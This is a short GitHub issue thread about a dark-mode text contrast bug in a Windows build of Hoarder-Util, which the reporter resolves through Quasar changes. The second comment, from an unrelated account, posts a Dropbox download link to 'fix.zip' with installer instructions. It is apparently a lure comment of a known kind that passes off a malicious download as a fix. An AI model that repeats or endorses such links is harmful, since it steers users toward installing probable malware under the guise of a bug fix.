### ISSUE TITLE
[bug] On Windows build, the text is black on dark background

### ISSUE THREAD

**Issue by Jkwok0714** [TestaDiMucca/Hoarder-Util#121]
That is all.

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Jkwok0714** [comment]
Probably associated with`prefers-color-scheme: light`

Best to dev this on Windows

**Comment by Jkwok0714** [comment]
Blocked by windows enc combusting 😡

**Comment by Jkwok0714** [comment]
<img width="884" alt="Screenshot 2024-10-01 at 11 42 28 PM" src="https://github.com/user-attachments/assets/f27966bd-e191-4801-aac1-f3fa3761266e">
Resolved with quasar changes
